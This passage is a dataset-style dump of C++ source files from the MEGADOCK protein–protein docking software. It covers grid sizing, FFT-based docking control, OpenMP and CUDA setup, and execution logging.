processors limitation\n const int thread_limit = _parameter->_Num_thread_limit;\n const int gpu_limit = _parameter->_Num_GPU_limit;\n\n if(_parallel->nproc2() > thread_limit) {\n _parallel->nproc2(thread_limit);\n }\n\n if(_parallel->num_gpu() > gpu_limit || _parallel->num_gpu() > _parallel->nproc2()) {\n _parallel->num_gpu( min(gpu_limit, 
(int)_parallel->nproc2()) );\n }\n printf(\"# Using %3d CPU cores, %d GPUs\\n\", _parallel->nproc2(), _parallel->num_gpu());\n\n // Receptor\n _receptor = new Receptor<ParameterPDB>(_parameter->_RecPDB_file);\n _receptor->initialize(_parameter);\n _cputime->record_malloc( sizeof(float)*_receptor->num_atoms()*3 ); //Atom coordinate\n\n // Ligand<ParameterPDB>\n _ligand = new Ligand<ParameterPDB>(_parameter->_LigPDB_file);\n _ligand->initialize(_parameter);\n _cputime->record_malloc( sizeof(float)*_ligand->num_atoms()*3 ); //Atom coordinate\n\n if( !_parameter->_Num_fft_flag ) {\n switch (_parameter->fft_base_set) {\n case 13:\n gridtable_13base_normal(ngrid,ngrid_table);\n break;\n case 7:\n gridtable_07base_normal(ngrid,ngrid_table);\n break;\n case 11:\n gridtable_11base_normal(ngrid,ngrid_table);\n break;\n case 0:\n gridtable_fftw_custom(ngrid,ngrid_table);\n break;\n case 1:\n gridtable_cufft_custom(ngrid,ngrid_table);\n break;\n }\n autogridr(ngrid,ngrid_table);\n autogridl(ngrid,ngrid_table);\n } else {\n checkgridr();\n checkgridl();\n }\n\n // DockingPDB\n _docking = new DockingPDB(_cputime,_parallel,_parameter,_receptor,_ligand);\n _docking->initialize();\n\n gettimeofday(&et2,NULL);\n _cputime->t1_initialize += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::autogridr(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size, size_rec = 0.0;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n \n //printf(\" %f, %f\\n\",_receptor->edge(i,1),_receptor->edge(i,0));\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n cout << \"\\nReceptor = \" << _receptor->input_file() << endl;\n cout << \"Receptor max size = \" << size_rec << endl;\n\n size_rec += 2.0 * _parameter->_Grid_space_rec;\n cout << \"Required voxel size = \" << size_rec << endl;\n\n num_grid = 1 + int(size_rec / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) {\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _receptor->num_grid(num_grid);\n\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::autogridl(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n\n cout << \"\\nLigand = \" << _ligand->input_file() << endl;\n cout << \"Ligand max size = \" << size_lig << endl;\n\n size_lig += 2.0 * _parameter->_Grid_space_lig;\n \n _parameter->ligand_max_edge = size_lig;\n\n cout << \"Required voxel size = \" << size_lig << endl;\n\n num_grid = 1 + int(size_lig / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) 
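// --- [editorial aside] ------------------------------------------------------
// The table scan that follows snaps the required voxel count to the next
// FFT-friendly size from ngrid_table (the gridtable_* generators suggest
// sizes whose FFT lengths factor into small primes). A minimal stand-alone
// sketch of the same snapping logic (illustrative names, not MEGADOCK's API):
#include <vector>
static int snap_to_fft_grid(float required_size, float grid_width,
                            const std::vector<int> &ngrid_table) {
    int num_grid = 1 + (int)(required_size / grid_width);  // as computed above
    for (const int candidate : ngrid_table)
        if (candidate >= num_grid) return candidate;       // first entry that fits
    return num_grid;  // table exhausted: keep the raw requirement
}
// --- [end editorial aside] ---------------------------------------------------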
{\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _ligand->num_grid(num_grid);\n\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::checkgridr()\n//============================================================================//\n{\n float size, size_rec = 0.0;\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n cout << \"\\nReceptor max size = \" << size_rec << endl;\n\n size_rec += 2.0*_parameter->_Grid_space_rec;\n\n cout << \"Required voxel size = \" << size_rec << endl;\n\n if( size_rec > search_length ) {\n cerr << \"[ERROR] Receptor data is too big!!\\n\";\n exit(1);\n }\n\n _receptor->num_grid(num_grid);\n\n cout << \"\\n(Receptor)\\n\";\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n cout << \"Grid size = \" << _parameter->grid_width << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::checkgridl()\n//============================================================================//\n{\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n cout << \"\\nLigand max size = \" << size_lig << endl;\n\n size_lig += 2.0*_parameter->_Grid_space_lig;\n cout << \"Required voxel size = \" << size_lig << endl;\n\n if( size_lig > search_length ) {\n cerr << \"[ERROR] Ligand data is too big!!\\n\";\n exit(1);\n }\n\n _ligand->num_grid(num_grid);\n\n cout << \"\\n(Ligand)\\n\";\n cout << \"Number of grid = \" << num_grid << endl;\n cout << \"FFT N = \" << num_grid*2 << endl;\n cout << \"Grid size = \" << _parameter->grid_width << endl;\n\n return;\n}\n\n//============================================================================//\nvoid ControlPDB::execute()\n//============================================================================//\n{\n struct timeval et1, et2;\n\n cout << \"\\n---------- Start docking calculations\" << endl;\n\n gettimeofday(&et1,NULL); // Receptor process (voxelization, forward FFT of Receptor)\n _docking->rec_init();\n gettimeofday(&et2,NULL);\n _cputime->t2_receptor_process += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n gettimeofday(&et1,NULL); // docking\n _docking->dockz();\n gettimeofday(&et2,NULL);\n _cputime->t3_docking_total += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n if(_parameter->detail_output_flag == 1) { // detailed result output\n gettimeofday(&et1,NULL);\n _docking->output_detail();\n gettimeofday(&et2,NULL);\n _cputime->t4_docking_output_detail += (et2.tv_sec-et1.tv_sec + 
(float)((et2.tv_usec-et1.tv_usec)*1e-6));\n }\n\n if(_parameter->calc_time_log_output_flag >= 1) { // calculation info\n _docking->output_calc_time_log();\n }\n\n gettimeofday(&et1,NULL); // normal result output\n _docking->output();\n gettimeofday(&et2,NULL);\n _cputime->t5_docking_output += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n _docking->dock_memory_free();\n\n const int ng1 = _parameter->_Num_grid;\n const int ng3 = ng1*ng1*ng1;\n const int nf1 = ng1*2;\n const int nf3 = nf1*nf1*nf1;\n const int nproc2 = _parallel->nproc2();\n const int natom = _parameter->_Num_atom_max;\n const int nag = natom * ng1;\n const size_t _Memfw = ng3*3+natom*3+nag*3;\n const size_t _Memiw = ng3*2+natom*4;\n\n //delete docking include delete fft_process, _FFT_rec_r/i[nf3], _FFTWin/out[nf3*nproc2]\n _cputime->record_free( sizeof(float)*nf3*2 + sizeof(fftwf_complex)*nf3*2*nproc2);\n#ifdef CUFFT\n _cputime->record_free( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n#endif\n _cputime->record_free( sizeof(float)*_Memfw*nproc2 + sizeof(int)*_Memiw*nproc2 ); //_F/Iwork\n delete _docking;\n _cputime->record_free( sizeof(float)*_ligand->num_atoms()*3 );\n delete _ligand;\n _cputime->record_free( sizeof(float)*_receptor->num_atoms()*3 );\n delete _receptor;\n _cputime->record_free( sizeof(float)*_parameter->_Num_rot_angles*3 + sizeof(unordered_map<string,float>)*(_parameter->_Charmmr.size() + _parameter->_Charmmc.size() + _parameter->_ACE.size()) );\n delete _parameter;\n\n\n return;\n}\n" }, { "alpha_fraction": 0.47106310725212097, "alphanum_fraction": 0.4857412576675415, "avg_line_length": 30.332202911376953, "blob_id": "e63fbb355850b6340e2d67d4e352677d1d840d68", "content_id": "9a47df89442d913c6395a4016a8d94e6b9a5e0e4", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9538, "license_type": "permissive", "max_line_length": 130, "num_lines": 295, "path": "/megadock-scfa20/main.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\r\n * Copyright (C) 2019 Tokyo Institute of Technology\r\n */\r\n\r\n//============================================================================//\r\n//\r\n// Software Name : MEGADOCK\r\n//\r\n// Class Name : (main)\r\n//\r\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\r\n//\r\n//============================================================================//\r\n\r\n#include <string.h>\r\n#include \"cpu_time.h\"\r\n#include \"exec_logger.h\"\r\n#include \"control_pdb.h\"\r\n#include \"control_table.h\"\r\n\r\n#ifdef CUFFT\r\n#include <helper_cuda.h>\r\n#define VERSION \"4.1.0 for GPU & \"\r\n#else\r\n#define VERSION \"4.1.0 for CPU & \"\r\n#endif\r\n\r\n#ifdef MPI_DP\r\n#define VTEXT \"multiple nodes\"\r\n#else\r\n#define VTEXT \"single node\"\r\n#endif\r\n\r\n#define LASTUPDATED \"26 March, 2019\"\r\n\r\nstruct DockingPair {\r\n string rec_file, lig_file, out_file;\r\n DockingPair(string rec_file, string lig_file, string out_file) : rec_file(rec_file), lig_file(lig_file), out_file(out_file) {}\r\n};\r\n\r\n//============================================================================//\r\nvoid get_pair(string line, string &rec_file, string &lig_file, string &out_file)\r\n//============================================================================//\r\n{\r\n int first_tab_index = line.find_first_of('\\t');\r\n if (first_tab_index == string::npos) {\r\n cerr << \"[Error] Ligand is not specified.\" << 
endl;\r\n exit(1);\r\n }\r\n rec_file = line.substr(0, first_tab_index);\r\n\r\n int second_tab_index = line.find_last_of('\\t');\r\n if (first_tab_index == second_tab_index) {\r\n lig_file = line.substr(first_tab_index + 1, line.size() - 1 - first_tab_index);\r\n out_file = \"\";\r\n } else {\r\n lig_file = line.substr(first_tab_index + 1, second_tab_index - 1 - first_tab_index);\r\n out_file = line.substr(second_tab_index + 1, line.size() - 1 - second_tab_index);\r\n }\r\n}\r\n\r\n//============================================================================//\r\nvoid initialize(int argc, char *argv[], int &nproc2, int &device_count_gpu)\r\n//============================================================================//\r\n{\r\n cout << \" MEGADOCK ver. \"<< VERSION << VTEXT << endl;\r\n cout << \" [email protected] lastupdated: \" << LASTUPDATED << endl;\r\n cout << endl;\r\n\r\n#ifdef _OPENMP\r\n #pragma omp parallel\r\n {\r\n nproc2 = omp_get_num_threads();\r\n if(omp_get_thread_num() == 0) {\r\n cout << \"# Using OpenMP parallelization: \" << nproc2 << \" threads.\" << endl;\r\n }\r\n }\r\n //printf(\"#OpenMP version %d\\n\", _OPENMP);\r\n#else\r\n nproc2 = 1;\r\n#endif //#ifdef _OPENMP\r\n\r\n#ifdef CUFFT\r\n int nogpu_flag = 0;\r\n for (int num = 0; num < (argc-1); ++num) {\r\n if(!strncmp(argv[num], \"-G\", 2)) {\r\n if(argv[num+1] != NULL) {\r\n if(atoi(argv[num+1]) == 0) {\r\n nogpu_flag = 1;\r\n }\r\n }\r\n }\r\n }\r\n\r\n if(nogpu_flag != 1) {\r\n checkCudaErrors( cudaGetDeviceCount(&device_count_gpu) );\r\n if (device_count_gpu == 0) {\r\n fprintf(stderr, \"GPU Error: no devices supporting CUDA.\\n\");\r\n exit(-1);\r\n }\r\n\r\n cudaDeviceProp deviceProp;\r\n checkCudaErrors( cudaGetDeviceProperties(&deviceProp, 0));\r\n if (deviceProp.major < 1) {\r\n fprintf(stderr, \"GPU Error: device does not support CUDA.\\n\");\r\n exit(-1);\r\n }\r\n\r\n cudaSetDeviceFlags(cudaDeviceMapHost);\r\n fprintf(stdout, \"# Using CUDA device %d: %s\\n\", 0, deviceProp.name);\r\n cudaSetDevice(0);\r\n //fprintf(stdout, \"# Init CUDA device OK.\\n\");\r\n\r\n int cufft_version;\r\n cufftGetVersion(&cufft_version);\r\n printf(\"# CUFFT version : %d\\n\", cufft_version);\r\n }\r\n\r\n printf(\"# Number of available [threads / GPUs] : [%d / %d]\\n\",nproc2,device_count_gpu);\r\n#endif\r\n}\r\n\r\n//============================================================================//\r\nvoid main_pdb(int argc, char *argv[])\r\n//============================================================================//\r\n{\r\n Parallel *_parallel;\r\n CPUTime *_cputime;\r\n ControlPDB *_control;\r\n\r\n struct timeval et1, et2;\r\n struct timeval et3, et4;\r\n int nproc2 = 0;\r\n int device_count_gpu = 0;\r\n\r\n gettimeofday(&et1,NULL);\r\n gettimeofday(&et3,NULL);\r\n\r\n initialize(argc, argv, nproc2, device_count_gpu);\r\n\r\n _cputime = new CPUTime();\r\n _cputime->initialize();\r\n\r\n _parallel = new Parallel(nproc2);\r\n _parallel->num_gpu(device_count_gpu); \r\n\r\n gettimeofday(&et4,NULL);\r\n _cputime->t1_initialize += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\r\n\r\n _control = new ControlPDB(_cputime,_parallel);\r\n _control->initialize(argc,argv);\r\n _control->execute();\r\n\r\n delete _control;\r\n delete _parallel;\r\n\r\n _cputime->output();\r\n\r\n delete _cputime;\r\n\r\n gettimeofday(&et2,NULL);\r\n\r\n const float elapsed_time = (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\r\n printf(\"\\n\");\r\n printf(\"Elapsed time = %8.2f 
sec.\\n\",elapsed_time);\r\n}\r\n\r\n//============================================================================//\r\nvoid main_table(int argc, char *argv[])\r\n//============================================================================//\r\n{\r\n struct timeval et3, et4;\r\n int nproc2 = 0;\r\n int device_count_gpu = 0;\r\n\r\n gettimeofday(&et3,NULL);\r\n\r\n initialize(argc, argv, nproc2, device_count_gpu);\r\n\r\n struct timeval et1[nproc2], et2[nproc2];\r\n\r\n Parallel *_parallels[nproc2];\r\n ExecLogger *_exec_loggers[nproc2];\r\n ControlTable *_controls[nproc2];\r\n ParameterTable *_parameters[nproc2];\r\n\r\n for (int i = 0; i < nproc2; i++) {\r\n _parallels[i] = new Parallel(nproc2);\r\n _parallels[i]->num_gpu(device_count_gpu);\r\n _exec_loggers[i] = new ExecLogger();\r\n\r\n // ParameterTable\r\n _parameters[i] = new ParameterTable(_parallels[i]);\r\n if (i == 0) {\r\n _parameters[i]->initialize(argc,argv);\r\n } else {\r\n _parameters[i]->initialize(_parameters[0]);\r\n }\r\n _exec_loggers[i]->record_malloc(_parameters[i]->allocate_size()); //Rotation angles[], Atom radius, charge, ACE[]\r\n\r\n _controls[i] = new ControlTable(_exec_loggers[i],_parallels[i],_parameters[i]);\r\n _controls[i]->initialize(i == 0);\r\n }\r\n\r\n\r\n ifstream input_stream(_controls[0]->input_file());\r\n if (!input_stream.is_open()) {\r\n cerr << \"Unable to open input file.\" << endl;\r\n exit(1);\r\n }\r\n string line;\r\n vector<DockingPair> pairs;\r\n while (getline(input_stream, line)) {\r\n string rec_file, lig_file, out_file;\r\n get_pair(line, rec_file, lig_file, out_file);\r\n pairs.push_back(DockingPair(rec_file, lig_file, out_file));\r\n }\r\n\r\n#pragma omp parallel for schedule(dynamic, 1)\r\n for (int i = 0; i < pairs.size(); i++) {\r\n int myid2 = omp_get_thread_num();\r\n DockingPair _docking_pair = pairs[i];\r\n gettimeofday(&et1[myid2],NULL);\r\n _exec_loggers[myid2]->initialize();\r\n#pragma omp critical (prepare)\r\n {\r\n _controls[myid2]->prepare(_docking_pair.rec_file, _docking_pair.lig_file, _docking_pair.out_file);\r\n }\r\n _controls[myid2]->execute();\r\n\r\n gettimeofday(&et2[myid2],NULL);\r\n\r\n const float elapsed_time = (et2[myid2].tv_sec-et1[myid2].tv_sec + (float)((et2[myid2].tv_usec-et1[myid2].tv_usec)*1e-6));\r\n printf(\"\\n\");\r\n\r\n#pragma omp critical (output)\r\n {\r\n printf(\"# ========================================\\n\");\r\n _exec_loggers[myid2]->output(myid2);\r\n printf(\"Elapsed time = %8.2f sec.\\n\"\r\n \"# ========================================\\n\"\r\n ,elapsed_time);\r\n }\r\n }\r\n\r\n#pragma omp parallel for\r\n for (int i = 0; i < nproc2; i++) {\r\n delete _exec_loggers[i];\r\n delete _controls[i];\r\n delete _parallels[i];\r\n delete _parameters[i];\r\n }\r\n\r\n gettimeofday(&et4,NULL);\r\n\r\n const float total_time = (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\r\n printf(\"\\n\");\r\n printf(\"Total time = %8.2f sec.\\n\",total_time);\r\n}\r\n\r\n//============================================================================//\r\n#ifdef MPI_DP\r\nint application(int argc,char *argv[])\r\n#else\r\nint main(int argc, char *argv[])\r\n#endif\r\n//============================================================================//\r\n{\r\n bool table_input_flag = false, pdb_input_flag = false;\r\n for (int num = 0; num < argc; ++num) {\r\n if (!(strncmp(argv[num], \"-R\", 2) && strncmp(argv[num], \"-L\", 2) && strncmp(argv[num], \"-o\", 2))) {\r\n pdb_input_flag = true;\r\n } else if (!strncmp(argv[num], \"-I\", 2)) 
{\r\n table_input_flag = true;\r\n } else if (!strncmp(argv[num], \"-h\", 2)) {\r\n usage();\r\n }\r\n }\r\n if (pdb_input_flag) {\r\n if (table_input_flag) {\r\n fprintf(stderr, \"[ERROR] A pair of PDB files and a docking pair list file cannot be specified simultaneously.\\n\");\r\n usage();\r\n } else {\r\n main_pdb(argc, argv);\r\n }\r\n } else {\r\n if (table_input_flag) {\r\n main_table(argc, argv);\r\n } else {\r\n fprintf(stderr, \"[ERROR] A pair of PDB files or a docking pair list file has to be specified.\\n\");\r\n usage();\r\n }\r\n }\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.4005347490310669, "alphanum_fraction": 0.4064171016216278, "avg_line_length": 28.21875, "blob_id": "b6623919d4e61b38308a6b58d85c362f643d9322", "content_id": "7d978d69be2ac8751b4fd77a4cbddd189448768d", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1870, "license_type": "permissive", "max_line_length": 80, "num_lines": 64, "path": "/megadock-scfa20/fft_process.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcess\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"fft_process.h\"\n\n#ifdef CUFFT\n\n#include \"cuda_kernel.cu\"\n\n#endif\n\n//============================================================================//\nbool ascending_struct(const SortScore &s1,const SortScore &s2) // for sort\n//============================================================================//\n{\n return s1.score > s2.score;\n}\n\n//============================================================================//\ntemplate<class P> void FFTProcess<P>::sort_index(float *fwork,int *iwork)\n//============================================================================//\n{\n const int no = _parameter->_Num_output;\n const int nt = (_Top.size() < no) ? 
_Top.size() : no;\n\n partial_sort(_Top.begin(),_Top.begin()+nt,_Top.end(),\n ascending_struct);\n\n return;\n}\n\n//============================================================================//\ntemplate<class P> void FFTProcess<P>::top_score_clean()\n//============================================================================//\n{\n const int num_sort = _parameter->_Num_sort;\n const int num_angle = _parameter->_Num_rot_angles;\n const int no = _parameter->_Num_output;\n int num_toprank;\n\n num_toprank = num_angle * num_sort;\n if( no > num_toprank ) num_toprank = no;\n\n for( int j = 0 ; j < num_toprank ; j++ ) {\n _Top[j].score = 0.0;\n }\n\n return;\n}\n\n// explicit instantiations\ntemplate class FFTProcess<ParameterPDB>;\ntemplate class FFTProcess<ParameterTable>;\n" }, { "alpha_fraction": 0.5891410112380981, "alphanum_fraction": 0.5931928753852844, "avg_line_length": 23.68000030517578, "blob_id": "dbcb1027a902def17c4c8f25a31f346328a917d9", "content_id": "fb71102eba0cd1d9d335d1d8778d8e362d1555ed", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1234, "license_type": "permissive", "max_line_length": 80, "num_lines": 50, "path": "/megadock-scfa20/control_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef ControlPDB_h\n#define ControlPDB_h 1\n\n#include \"control.h\"\n#include \"cpu_time.h\"\n#include \"parameter_pdb.h\"\n#include \"docking.h\"\n\nusing namespace std;\n\nclass ControlPDB : public Control<ParameterPDB, DockingPDB>\n{\nprivate:\n CPUTime *_cputime;\nprotected:\n virtual void autogridr(const int &ngrid,vector<int> &ngrid_table);\n virtual void autogridl(const int &ngrid,vector<int> &ngrid_table);\n virtual void checkgridr();\n virtual void checkgridl();\npublic:\n ControlPDB(CPUTime *pcputime,Parallel *pparallel)\n : _cputime(pcputime),Control<ParameterPDB, DockingPDB>(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing ControlPDB.\\n\";\n#endif\n }\n virtual ~ControlPDB() {\n#ifdef DEBUG\n cout << \"Destructing ControlPDB.\\n\";\n#endif\n }\n virtual void initialize(int argc,char *argv[]);\n virtual void execute();\n};\n\n#endif\n" }, { "alpha_fraction": 0.4781523048877716, "alphanum_fraction": 0.49126091599464417, "avg_line_length": 31.363636016845703, "blob_id": "151689ae44fd8791f357ff39b272a6eb5d32b7e5", "content_id": "2a5986868443eca8b202dbdecffe12f95afdc68d", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3204, "license_type": "permissive", "max_line_length": 121, "num_lines": 99, "path": "/megadock-scfa20/application.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Application\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA 
Lab.\n//\n//============================================================================//\n\n#include \"application.h\"\n\n//============================================================================//\nvoid Application::initialize()\n//============================================================================//\n{\n#ifdef CUFFT\n checkCudaErrors( cudaGetDeviceCount(&device_count_gpu) );\n if (device_count_gpu == 0) {\n fprintf(stderr, \"GPU Error: no devices supporting CUDA.\\n\");\n exit(-1);\n }\n\n cudaDeviceProp deviceProp;\n checkCudaErrors( cudaGetDeviceProperties(&deviceProp, 0));\n if (deviceProp.major < 1) {\n fprintf(stderr, \"GPU Error: device does not support CUDA.\\n\");\n exit(-1);\n }\n\n cudaSetDeviceFlags(cudaDeviceMapHost);\n fprintf(stdout, \"# Using CUDA device %d: %s\\n\", 0, deviceProp.name);\n cudaSetDevice(0);\n //fprintf(stdout, \"# Init CUDA device OK.\\n\");\n\n int cufft_version;\n cufftGetVersion(&cufft_version);\n printf(\"# CUFFT version : %d\\n\", cufft_version);\n\n printf(\"# Number of available [threads / GPUs] : [%d / %d]\\n\",nproc2,device_count_gpu);\n#endif\n\n _parallels = new Parallel*[nproc2];\n _exec_loggers = new ExecLogger*[nproc2];\n _controls = new ControlTable*[nproc2];\n _parameters = new ParameterTable*[nproc2];\n\n for (int i = 0; i < nproc2; i++) {\n _parallels[i] = new Parallel(nproc2);\n _parallels[i]->num_gpu(device_count_gpu);\n _exec_loggers[i] = new ExecLogger();\n\n // ParameterTable\n _parameters[i] = new ParameterTable(_parallels[i]);\n if (i == 0) {\n _parameters[i]->initialize();\n } else {\n _parameters[i]->initialize(_parameters[0]);\n }\n _exec_loggers[i]->record_malloc(_parameters[i]->allocate_size()); //Rotation angles[], Atom radius, charge, ACE[]\n\n _controls[i] = new ControlTable(_exec_loggers[i],_parallels[i],_parameters[i]);\n _controls[i]->initialize(i == 0);\n }\n}\n\n//============================================================================//\nint Application::application(int argc, char *argv[], int myid2)\n//============================================================================//\n{\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n _exec_loggers[myid2]->initialize();\n#pragma omp critical\n {\n _parameters[myid2]->process_args(argc, argv);\n _controls[myid2]->prepare();\n }\n _controls[myid2]->execute();\n\n gettimeofday(&et2,NULL);\n\n const float elapsed_time = (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n printf(\"\\n\");\n\n#pragma omp critical\n {\n printf(\"# ========================================\\n\");\n _exec_loggers[myid2]->output(myid2);\n printf(\"Elapsed time = %8.2f sec.\\n\"\n \"# ========================================\\n\"\n ,elapsed_time);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5599473118782043, "alphanum_fraction": 0.5638998746871948, "avg_line_length": 20.685714721679688, "blob_id": "f3b2f7d1bfcefb4d720ace0bda71d8c1e9b63f0d", "content_id": "4961e1cfe32566cc55d6fd27fa3146694955daff", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1518, "license_type": "permissive", "max_line_length": 80, "num_lines": 70, "path": "/megadock-scfa20/exec_logger.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : 
ExecLogger\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Exec_logger_h\n#define Exec_logger_h 1\n\n#include <stdio.h>\n#include <string>\n#include <iostream>\n\n#include \"cpu_time.h\"\n\nusing namespace std;\n\nclass ExecLogger\n{\nprivate:\n ExecLogger(ExecLogger &c) {}\n const ExecLogger & operator=(const ExecLogger &c);\n\npublic:\n CPUTime *_cputime;\n long double mb;\n\n#ifdef CUFFT\n size_t devmem_free, devmem_total, devmem_use;\n#endif\n\n string _RLOut_file;\n int _Num_fft_flag;\n string rec_filename, lig_filename;\n float rec_max_size, lig_max_size;\n float rec_voxel_size, lig_voxel_size;\n int rec_num_grid, lig_num_grid;\n float grid_width;\n\n ExecLogger() {\n#ifdef DEBUG\n cout << \"Constructing ExecLogger.\\n\";\n#endif\n _cputime = new CPUTime();\n }\n virtual ~ExecLogger() {\n#ifdef DEBUG\n cout << \"Destructing ExecLogger\\n\";\n#endif\n delete _cputime;\n }\n virtual void initialize();\n virtual void output(const int myid2);\n virtual void record_malloc(const int &size) {\n _cputime->record_malloc(size);\n }\n virtual void record_free(const int &size) {\n _cputime->record_free(size);\n }\n};\n\n#endif\n" }, { "alpha_fraction": 0.5178565979003906, "alphanum_fraction": 0.5487224459648132, "avg_line_length": 39.81644821166992, "blob_id": "c1a1de34752cfb5782e8476c9f8caa5eab4e673b", "content_id": "6cb2de1b42aed8aac1f92f4f5e7e1977175fb912", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 34245, "license_type": "permissive", "max_line_length": 272, "num_lines": 839, "path": "/megadock-scfa20/fft_process_pdb.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"fft_process_pdb.h\"\n\n#define NUM_THREADS 512 //should be power of 2\n\n#ifdef CUFFT\n\n#include \"cuda_kernel.h\"\n\n#endif\n\n//============================================================================//\nvoid FFTProcessPDB::alloc_array(const int &num_fft)\n//============================================================================//\n{\n //cout << \"FFT::alloc_array |\" <<num_fft<< endl; cout.flush();\n _Num_fft = num_fft;\n\n const size_t nf3 